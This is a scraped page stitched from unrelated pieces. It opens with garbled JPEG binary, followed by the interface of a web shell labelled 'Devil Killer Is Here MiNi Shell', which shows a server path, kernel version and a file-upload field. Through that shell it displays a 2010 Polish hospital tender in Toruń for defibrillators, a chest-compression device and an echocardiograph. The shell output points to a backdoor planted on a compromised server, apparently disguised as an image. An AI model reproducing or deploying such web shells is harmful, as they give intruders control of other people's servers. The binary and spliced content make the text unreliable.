JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/192002-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa defibrylatorów, urządzenia do mechanicznej kompresji klatki piersiowej i echokardiografu.</b><br>
<b>Numer ogłoszenia: 192002 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa defibrylatorów, urządzenia do mechanicznej kompresji klatki piersiowej i echokardiografu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - dostawa 2 szt. defibrylatorów:<br>
1. Zasilanie akumulatorowe, w zestawie minimum trzy akumulatory litowo-jonowe bez efektu pamięci; 
2.Ilość wyładowań (praca na akumulatorach) przy mocy 360 J i temperaturze otoczenia 20oC - min. 360 wyładowań lub min. 330 minut ciągłego monitorowania EKG;
3. Ładowarka do akumulatorów zintegrowana z defibrylatorem lub oddzielna: zasilana 220 V;
4. Masa całkowita defibrylatora gotowego do pracy nie większa niż 10 kg;
5. Aparat wyposażony w ekran kolorowy LCD  o przekątnej min. 8,0 cali;
6. Wyświetlanie co najmniej 3 krzywych dynamicznych;
7. Monitorowanie EKG z 12 odprowadzeń z funkcją doradczą biorącą pod uwagę podczas analizy: wiek i płeć pacjenta;
8. Wzmocnienie sygnału EKG: 0,25; 0,5; 1,0; 1,5; 2,5; 3,0; 4,0 cm/mV;
9. Prezentacja tętna w zakresie min.: od 20 do 300 uderzeń na minutę;
10. Rodzaj fali defibrylującej: dwufazowa - z kompensacją impedancji ciała pacjenta, poziom energii defibrylacji w zakresie: co najmniej od 2 J do 360 J;
11. Dostępne minimum 24 różne poziomy energii;
12. Kardiowersja;
13. Defibrylacja ręczna;
14. Defibrylacja półautomatyczna, możliwość programowania energii 1, 2 i 3 wyładowania min w przedziale od: 150 do 330 J;
15. Funkcja stymulacji zewnętrznej z możliwością wykonania stymulacji w trybach na /żądanie/ i asynchronicznym;
16. Wyjściowe natężenie prądu, co najmniej w zakresie od 0 do 200 mA;
17. Częstość stymulacji minimum: od 40 do 170 impulsów na minutę.;
18. Nieinwazyjny pomiar ciśnienia tętniczego;
19. Zakres ciśnienia tętniczego:
Skurczowe min.: od 30 do 240,
Rozkurczowe min.: od 15 do 210,
Średnie min.: od 20 do 220;
20. Prezentacja tętna w zakresie min.: od 30 do 220 uderzeń na minutę;
21. Pomiar saturacji SpO2 w zakresie minimum od: 50% do 100%;
22. Pulsoksymetr: zakres częstości tętna min.: od 25 do 240 uderzeń na minutę;
23. Krzywa SpO2 z automatyczną regulacją wzmocnienia;
24. Metronom;
25. Wewnętrzna pamięć z możliwością archiwizacji odcinków krzywych EKG oraz przebiegu pracy: minimum 330 minut ciągłego EKG;
26. Alarmy monitorowanych funkcji;
27. Defibrylator gotowy do pracy bez dodatkowych nakładów (zawiera wszystkie kable, łączniki potrzebne do uruchomienia wszystkich jego funkcji);
28. Układ monitorujący zabezpieczony przed impulsem defibrylatora;
29. Wbudowany rejestrator termiczny, szerokość papieru min: 95 mm;
30. Wbudowany moduł Bluetooth;
31. Temperatura pracy: min od 0 do +45oC;
32. Wodoodporność/odporność na kurz: norma IP44;
33. Komunikacja z użytkownikiem w języku polskim (dotyczy również opisów na panelu sterowania, oraz wydawanych przez aparat komunikatów głosowych); 
34. Gwarancja - min. 24 miesiące;
35. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
36. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika; 
37. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
38. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie; 
39. Bezpłatna instalacja urządzenia;
40. Defibrylator zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);
41. Sposób dezynfekcji urządzenia; 
42. Numer kontaktowy z serwisem Wykonawcy.<br>
Zadanie Nr 2 - dostawa 1 szt. urządzenia do mechanicznej kompresji klatki piersiowej:<br>
1. Urządzenie do kompresji klatki piersiowej za pomocą tłoka mechanicznego napędzanego elektrycznie;
2. Ilość ucisków na minutę: 100 +/- 5 %;
3. Głębokość ucisku: 4-5 cm;
4. Urządzenie zasilane akumulatorem litowo-jonowym, o pojemności 3,3 Ah, bez efektu /pamięci/;
5. Minimum 40 minut pracy na pojedynczym, w pełni naładowanym akumulatorze;
6. Możliwość podłączenia do sieci 230 V;
7. Dopuszczalna szerokość klatki piersiowej pacjenta, min: 44 cm;
8. Urządzenie przenośne, dopuszczalna maksymalna waga wraz z torbą i akumulatorem: 10 kg;
9. Norma IP 44: odporność na kurz i zachlapania;
10. Dodatkowe akcesoria: 
 - torba do bezpiecznego transportu urządzenia,
 - kabel umożliwiający podłączenie do sieci 230 V,
 - jednorazowe nakładki na tłok - 2 szt.,
 - pasek do podtrzymywania głowy pacjenta podczas transportu,
 - pasek zabezpieczający ramiona pacjenta podczas transportu - 2 szt.;
11. Okres gwarancji - min 24 miesiące;
12. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika; 
13. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat;
14. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie; 
15. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
16. Aparat  zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);
17. Bezpłatna instalacja urządzenia; 
18. Sposób dezynfekcji urządzenia;
19. Numer kontaktowy z serwisem Wykonawcy.<br>
Zadanie Nr 3 - dostawa 1 szt. echokardiografu:<br>
I. PARAMETRY OGÓLNE 
1. Aparat stacjonarny na kołach z układem blokowania kół;
2. Zasilanie sieciowe 220-240V 50-60 Hz;
3. Minimalny zakres częstotliwości pracy aparatu od 1 do 15 MHz;
4. Maksymalna głębokość obrazowania min. 30 cm;
5. Częstotliwość odświeżania obrazu (frame rate) w trybie 2D 500 fps;
6. Dynamika wzmocnienia min. 180 dB; 
7. Monitor wysokiej rozdzielczości o przekątnej min. 20 cali o matrycy min. 1 MPixel; 
8. Monitor z możliwością:
- obrotu względem klawiatury,
- pochylenia,
- zmiany położenia w poziomie;
9. Regulacja w zakresie podnoszenia i  obniżania klawiatury wraz z monitorem;
10. Regulacja obrotu klawiatury. Blokada ustawionego położenia monitora i klawiatury;
11. Minimalna ilość niezależnych kanałów przetwarzania 50 000;
12. Minimalny zakres częstotliwości głowic 1,0-15,0 MHz;
13. Całkowita waga aparatu bez urządzeń peryferyjnych maks. 160 kg;
14. Całkowicie cyfrowy układ formowania wiązki ultradźwiękowej;
15. Konstrukcja umożliwiająca rozbudowę aparatu bez jego wymiany;
16. Niezależne gniazda do podłączenia głowic obrazowych min. 3;
17. Gniazdo do podłączenia głowicy ołówkowej /ślepego/ Dopplera cw;
18. Rejestracja pojedynczych klatek oraz pętli o regulowanej długości czasu trwania;
19. Pamięć indywidualnych ustawień aparatu dla poszczególnych jego użytkowników niezależna dla różnych aplikacji;
20. Cyfrowa drukarka termiczna czarno biała małoformatowa;
21. Podświetlane przełączniki funkcyjne;
II. TRYBY PRACY
1. 2D;
2. Obrazowanie w technice drugiej harmonicznej;
3. Automatyczna optymalizacja obrazu 2D za pomocą jednego przycisku w zależności od treści obrazu;
4. Powiększenie obrazów 2D (zoom) na obrazie rzeczywistym i zatrzymanym min. 10 krotnie;
5. Tryb 2D wyświetlany razem z M-modem oraz wyświetlanie tylko M-modu;
6. Kolor M-mode;
7. Jednoczesna prezentacja w czasie rzeczywistym na ekranie podzielonym na dwa obrazu 2D czarno białego oraz obrazu 2D z kolorowym Dopplerem;
8. Doppler spektralny z falą pulsacyjną;
9. Maksymalna mierzona prędkość przepływu przy zerowym kącie korekcji 6,5 m/s;
10. Doppler wielobramkowy;
11. Zakres regulacji kąta ? 0-90 stopni;
12. Zakres regulacji wielkości bramki min. 1-20 mm;
13. Automatyczna optymalizacja obrazu spektrum dopplerowskiego przy pomocy jednego przycisku;
14. Automatyczny obrys widma dopplerowskiego na obrazie ruchomym oraz zatrzymanym z wyliczeniem wskaźnika rezystywności i pulsacyjności;
15. Doppler spektralny z falą ciągłą;
16. Sterowany pod kontrolą obrazu 2D;
17. Maksymalna mierzona prędkość przy zerowym kącie min. 16 m/s;
18. Kolor Doppler;
19. Automatyczna regulacja częstotliwości pracy w Dopplerze kolorowym w zależności od głębokości położenia rejonu zainteresowania ROI;
20. Power Doppler;
21. Kolorowy Doppler Tkankowy;
22. Tkankowy Doppler spektralny;
23. Częstotliwość odświeżania obrazu (frame rate) w trybie Dopplera tkankowego min. 350 fps;
24. Prezentacja na ekranie EKG badanego pacjenta;
25. Kabel EKG na elektrody samoprzylepne;
III. ARCHIWIZACJA
1. Archiwizacja raportów z badań, obrazów i pętli obrazowych na wewnętrznym dysku twardym min. 120 GB;  
2. Zainstalowany w echokardiografie napęd dysków DVD do zapisu obrazów, pętli obrazowych i raportów badania w formatach JPG, avi i DICOM;
3. Zapis obrazów i pętli obrazowych na nośnikach pamięci typu pendrive USB oraz zewnętrznych dyskach twardych USB HDD;
4. Moduł do eksportu obrazów i pętli obrazowych do sieci LAN w formacie DICOM 3.0;
5. Współpraca z istniejącym systemem archiwizacji danych:  -   możliwość przekazywania raportów strukturalnych w zakresie danych pacjenta, pomiarów, obliczeń, -   możliwość przekazywania komentarzy. 
IV. GŁOWICE
1. Sektorowa, szerokopasmowa do badań kardiologicznych; 
2. Częstotliwość pracy od 1 do 5 MHz z tolerancją ? 0,5 MHz;
3. Ilość aktywnych elementów min. 80; 
4. Głębokość obrazowania 24 cm;
5. Obrazowanie w trybie drugiej harmonicznej;
6. Współpraca z głowicami trantorakalnymi przy aparacie już eksploatowanym iE33;
7. Współpraca z głowicą przezprzełykową współpracującą z aparatem już eksploatowanym iE33;
8. Liniowa, szerokopasmowa do badań naczyniowych;
9. Częstotliwość pracy głowicy w granicach 11 do 3 MHz z tolerancją ? 0,5 MHz;
10. Obrazowanie w trybie drugiej harmonicznej;
11. Obrazowanie trapezowe;
V. PAKIET POMIAROWO OBLICZENIOWY
1. Pomiary i obliczenia kardiologiczne;
2. W trybie 2D:
RVIDd, IVSs,IVSd,LVIDd,LVIDs,LVPWd,EF met. uproszczoną Simpsona, metodą dysków z jednej lub dwóch projekcji koniuszkowych, SV, CO, LVEDV, LVESV, LV mass; 
3. W trybie M-model: 
RVIDd, IVSs, IVSd, LVIDd, LVIDs, LVPWd, EF met. Teiholza, LA diam, Ao root, Ao Asc;
4. W trybie Dopplera:
Prędkości i gradienty maksymalne i średnie przez cztery ujścia oraz E/A, MVA,AVA, Qp/Qs, PISA;
5. Uzupełnienie kardiologicznego pakietu pomiarowo obliczeniowego o pomiary zdefiniowane przez użytkownika widoczne następnie w wyniku badania; 
6. Uzupełnienie kardiologicznego pakietu pomiarowo obliczeniowego o formuły obliczeniowe zdefiniowane przez użytkownika widoczne następnie w wyniku badania;
7. Pomiary i obliczenia naczyniowe;
8. Pomiary w badaniach naczyniowych PS, ED, PI, RI, akceleracja, HR;
9. Raport z badania kardiologicznego;
10. Raport z badania naczyniowego;
11. Oprogramowanie do echokardiograficznej próby obciążeniowej min. 10 projekcji, min. 8 etapów w każdej projekcji;
VI.	MOŻLIWOŚCI ROZBUDOWY APARATU
1. Możliwość rozbudowy systemu o moduł obrazowania 3D w czasie rzeczywistym (tzw 4D lub Live 3D);
2. Możliwość rozbudowy systemu o moduł szybkiej rekonstrukcji 3D obrazu Dopplera kolorowego;
3. Moduł obliczeniowy odkształceń (strain i strain rate) w oparciu o technikę Dopplera tkankowego;
4. Moduł obliczeniowy odkształceń (strain i strain rate) w oparciu o techniki nie dopplerowskie;
VII. WYPOSAŻENIE DODATKOWE 
1. Dodatkowa klawiatura;
2. Stanowisko do badań echokardiograficznych:
1. Fotel - 1 szt.: 
- teleskopowa regulacja wysokości siedziska,
- chromowana konstrukcja z obręczą umożliwiającą podparcie stóp,
- siedzisko stabilne, obrotowe, z podparciem pleców wymuszające prawidłową pozycję siedzącego poprzez stabilizację miednicy i tułowia,
- pokrycie siedziska i oparcia wykonane z materiału, łatwego do utrzymania w czystości (kolor do uzgodnienia z Zamawiającym) 
2. Fotel - 2 szt.:
- teleskopowa regulacja wysokości siedziska,
- chromowana konstrukcja z obręczą umożliwiającą podparcie stóp,
- siedzisko stabilne w trzech płaszczyznach, umocowane na pojedynczej sprężynie, wymuszające prawidłową pozycję siedzącego poprzez stabilizację miednicy i tułowia,
- oparcie poruszające się niezależnie od siedziska (obrót o 360 stopni względem siedziska),
- pokrycie siedziska i oparcia wykonane z antybakteryjnego materiału, łatwego do utrzymania w czystości (kolor do uzgodnienia z Zamawiającym), 
- waga 15 kg (+/-1 kg),
- konstrukcja krzesła zgodna z normami EN 1335-1, EN 1335-2, EN 1335-3.
3. Stół - 1 szt.:
   - stół dzielony na dwa segmenty: odcinek dla tułowia i dolnych części ciała, 
   - konstrukcja ze stali, pokryta lakierem proszkowym,  
   - stół na kółkach z możliwością blokowania każdego kółka z osobna, 
   - długość blatu: min. 185 cm,
   - szerokość blatu: min. 76 cm,
   - wysokość blatu: 
    regulowana w granicach min. 40 cm,   
    minimalna osiągalna nie większa niż: 59 cm,
   - oparcie regulowane od 0 stopni do 80 stopni,
   - obciążenie stołu do 220 kg,
   - pilot do sterowania wysokości i pozycji oparcia, 
   -  konstrukcja blatu stołu z wycięciami umożliwiającymi złożenie części blatu aby zwiększyć dostęp lekarza do pacjenta,
   -  materac wykonany z gumy piankowej, pokryty materiałem nienasiąkliwym i łatwy do utrzymania w czystości - grubość min. 5 cm dla części tułowia i min. 8 cm dla dolnych części ciała,
  - co najmniej dwa pasy ograniczające ruch pacjenta;
3. Zasilacz UPS  dostosowany do echokardiografu - 1 szt.;
4. Zasilacz UPS  min. 2 000 VA  - 1 szt.;
5. Drukarka laserowa kolorowa z print serwerem ( nie gorsza niż HP C1515n);
6. Macierz dyskowa 3 TB - 4 szt.;
VIII WARUNKI GWARANCJI  I SERWISU
1. Okres gwarancji - min 24 miesiące;
2. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
3. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
4. Bezpłatne szkolenie pracowników Zamawiającego obsługującego urządzenie;
5. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
6. Bezpłatna instalacja urządzenia;
7. Echokardiograf zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);
8. Sposób dezynfekcji urządzenia;
9. Numer kontaktowy z serwisem Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.21.00-0, 33.10.00.00-1, 33.11.23.40-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych min. 2 dostaw sprzętu medycznego o wartości min. dla poszczególnych zadań:
- Zadanie Nr 1 -      28.500,00 zł,
- Zadanie Nr 2 -      14.700,00 zł,
- Zadanie Nr 3 -    135.000,00 zł brutto każda dostawa w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;<br>
Wykonawca składający ofertę np. na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 2 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 43.200,00 zł każda dostawa.<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
- Zadanie Nr 1 -      19.000,00 zł,
- Zadanie Nr 2 -        9.800,00 zł,
- Zadanie Nr 3 -      90.000,00 zł,
wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br>
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.<br>
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
